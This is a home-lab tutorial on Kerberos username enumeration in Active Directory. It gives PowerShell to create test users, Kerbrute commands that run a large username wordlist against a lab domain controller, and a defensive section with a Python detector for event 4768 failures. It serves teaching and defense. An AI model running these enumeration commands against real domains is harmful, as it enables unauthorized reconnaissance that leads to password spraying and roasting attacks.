Building a Windows AD lab

Username Enumeration

It is possible to enumerate valid usernames without authentication by sending TGT requests with no pre-authentication.


Last updated 2 years ago

Configuring

  1. To implement the attack we need to create a couple of users with easily guessable usernames. To do this we pick some usernames from a popular list of usernames in the SecLists repository. We will create the following users:

john
david
robert
chris
mike
dave
richard
thomas
steve
mark

Creating users

2. Previously we created users by using the GUI. Now we will create users using PowerShell. Create the file users.txt and place the usernames in there. Then create the users:

# Place the usernames (one per line) in C:\users.txt
cd C:\
notepad users.txt

# Create one enabled user per line in users.txt, all with the same password
$password = ConvertTo-SecureString 'ReallySecurePassword123!' -AsPlainText -Force
$names = Get-Content -Path C:\users.txt
ForEach ($name in $names) {
    New-ADUser -Name "$name" -GivenName "$name" -SamAccountName "$name" -UserPrincipalName "$name@amsterdam.bank.local" -Path "OU=Employees,DC=amsterdam,DC=bank,DC=local" -AccountPassword $password -Enabled $true
}

3. Run the command below to list all users and verify that the users were created:

Get-ADUser -Filter * | Select-Object Name

Attacking

How it works

To enumerate usernames, send TGT requests (AS-REQs) with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error (KDC_ERR_C_PRINCIPAL_UNKNOWN), the username does not exist. However, if the KDC prompts for pre-authentication (KDC_ERR_PREAUTH_REQUIRED), we know the username exists.

Executing the attack

1. To enumerate usernames we can use the tool Kerbrute. To install Kerbrute on Kali download the latest release from GitHub and save it somewhere. I would recommend /opt.

2. For the list of usernames download the list xato-net-10-million-usernames.txt from SecLists.

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/xato-net-10-million-usernames.txt

3. After downloading the tool and the username list, run Kerbrute against the domain amsterdam.bank.local and its DC 10.0.0.3. Pipe the output through tee to save it to the file username_enum.txt.

./kerbrute_linux_amd64 userenum -d amsterdam.bank.local --dc 10.0.0.3 xato-net-10-million-usernames.txt | tee username_enum.txt

These valid users can be used for AS-REP Roasting or Password Spraying attacks. For now save these users to users.txt.

4. To get only a list of usernames, execute the following command, which cuts the output down to the usernames, converts them to lowercase and sorts them for unique entries (the \L in the sed expression is a GNU sed extension):

cat username_enum.txt | grep bank.local | cut -d " " -f 8- | cut -d "@" -f 1 | sed 's/./\L&/g' | sort -u > users.txt

cat users.txt                                                                                                       
administrator
bank
chris
dave
david
john
mark
mike
richard
robert
steve
thomas

5. From here we can execute the following attacks to gain access to the domain:

  • Password Spraying
  • Empty Password
  • AS-REP Roasting

Defending

Recommendations

  • I don't know any configurations to block the enumeration of usernames. The best way to block this is using a non-traditional naming convention for the samAccountNames.

Detection

Work in Progress

The attack generates the Windows event ID 4768 "A Kerberos authentication ticket (TGT) was requested" if Kerberos logging is enabled.
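Added example, not code from the original page or from the Kerbrute project: detection logic that reads exported 4768 records and flags a source address that produced many distinct unknown-principal failures in a short window. It assumes the events have been exported from the DC as dicts carrying the event's TargetUserName, IpAddress and Status fields; the result codes 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) and 0x19 (KDC_ERR_PREAUTH_REQUIRED) are the documented values, while the sample records, the threshold and the window are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Result Code values of Security event 4768 on the DC.
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # requested name does not exist in the domain
KDC_ERR_PREAUTH_REQUIRED = "0x19"     # name exists; normal negotiation, not counted

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")

# Constructed sample records (not real logs); keys mirror the 4768 event
# data fields TargetUserName, IpAddress and Status.
SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:00", "TargetUserName": "aaron", "IpAddress": "::ffff:10.0.0.50", "Status": "0x6"},
    {"time": "2024-01-01T10:00:00", "TargetUserName": "abby", "IpAddress": "::ffff:10.0.0.50", "Status": "0x6"},
    {"time": "2024-01-01T10:00:01", "TargetUserName": "john", "IpAddress": "::ffff:10.0.0.50", "Status": "0x19"},
    {"time": "2024-01-01T10:00:01", "TargetUserName": "adam", "IpAddress": "::ffff:10.0.0.50", "Status": "0x6"},
    {"time": "2024-01-01T10:00:02", "TargetUserName": "alex", "IpAddress": "::ffff:10.0.0.50", "Status": "0x6"},
    {"time": "2024-01-01T10:00:02", "TargetUserName": "amy", "IpAddress": "::ffff:10.0.0.50", "Status": "0x6"},
    # One mistyped name from a workstation, followed by success: normal noise.
    {"time": "2024-01-01T10:03:00", "TargetUserName": "thomsa", "IpAddress": "::ffff:10.0.0.21", "Status": "0x6"},
    {"time": "2024-01-01T10:03:05", "TargetUserName": "thomas", "IpAddress": "::ffff:10.0.0.21", "Status": "0x0"},
]

def detect_user_enumeration(events, threshold=5, window=timedelta(minutes=5)):
    """Return {source_ip: sorted unknown names} for every source address that
    produced at least `threshold` distinct unknown-principal failures within
    `window`. Threshold and window are assumed tuning values for this lab."""
    unknown = defaultdict(list)
    for e in events:
        if e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[e["IpAddress"]].append((_ts(e["time"]), e["TargetUserName"]))
    hits = {}
    for ip, attempts in unknown.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # Advance the window start until all attempts in it fit in `window`.
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            names = {name for _, name in attempts[start:end + 1]}
            if len(names) >= threshold:
                hits[ip] = sorted(names)
                break
    return hits

if __name__ == "__main__":
    for ip, names in detect_user_enumeration(SAMPLE_EVENTS).items():
        print(f"possible username enumeration from {ip}: {len(names)} unknown names, e.g. {names[:3]}")
```

A run of the wordlist from the steps above produces thousands of 0x6 failures from a single address within seconds, far above the occasional mistyped name, so the threshold mainly needs to stay above that typo noise.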

References

  • Kerbrute user enumeration (source of this technique): https://github.com/ropnop/kerbrute#user-enumeration
  • SecLists username lists (xato-net-10-million-usernames.txt): https://github.com/danielmiessler/SecLists